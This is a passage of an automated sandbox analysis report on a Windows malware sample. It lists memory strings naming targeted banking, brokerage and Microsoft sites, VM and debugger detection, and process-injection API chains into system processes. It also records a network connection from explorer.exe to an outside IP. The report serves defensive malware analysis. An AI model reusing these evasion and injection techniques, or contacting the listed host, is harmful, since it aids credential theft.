                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: explorer.exe, 00000007.00000002.3296402764.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: explorer.exe, 00000007.00000003.3101098577.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: explorer.exe, 00000007.00000000.2061516657.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: explorer.exe, 00000007.00000000.2053655662.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: explorer.exe, 00000007.00000002.3296402764.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: explorer.exe, 00000007.00000003.3101098577.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: explorer.exe, 00000007.00000000.2049075653.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-927
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-932
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-929
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-949
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-879
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-895
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-885
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-884
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-875
                  Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_7-39576
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-927
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-931
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-929
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-950
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,1_2_00007FF79483321C
                  Found API chain indicative of debugger detection
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_11-1182
                  Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
                  Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_6-1128
                  Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_1-1182
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD64ED0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79CD64ED0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D7A24 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_0E8D7A24
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B88B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,7_2_0E8B88B0
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61220 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,SetFileAttributesW,SetFileAttributesW,CreateProcessW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_00007FF79CD61220
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD699E4 GetProcessHeap,0_2_00007FF79CD699E4
                  Source: C:\Windows\System32\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD62168 SetUnhandledExceptionFilter,0_2_00007FF79CD62168
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD64ED0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79CD64ED0
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD6224C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF79CD6224C
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61F88 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79CD61F88
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_00409950 SetUnhandledExceptionFilter,2_2_00409950
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,2_2_00409930
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8E0350 SetUnhandledExceptionFilter,7_2_0E8E0350
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00007FF641F2BBC0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF641F2C44C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F39924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF641F39924
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2C62C SetUnhandledExceptionFilter,20_2_00007FF641F2C62C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF641F2BBC0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF641F2C44C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F39924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF641F39924
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2C62C SetUnhandledExceptionFilter,21_2_00007FF641F2C62C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8370F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF8B8370F20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B834A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8B834A184
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB65054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF8BFB65054
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB64A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8BFB64A34
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF8BFB76810
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8BFB75DF8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB769F8 SetUnhandledExceptionFilter,21_2_00007FF8BFB769F8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8BFB9D414
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Benign windows process drops PE files
                  Source: C:\Windows\explorer.exeFile created: 58B.tmp.zx.exe.7.drJump to dropped file
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794832048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,1_2_00007FF794832048
                  Contains functionality to inject threads in other processes
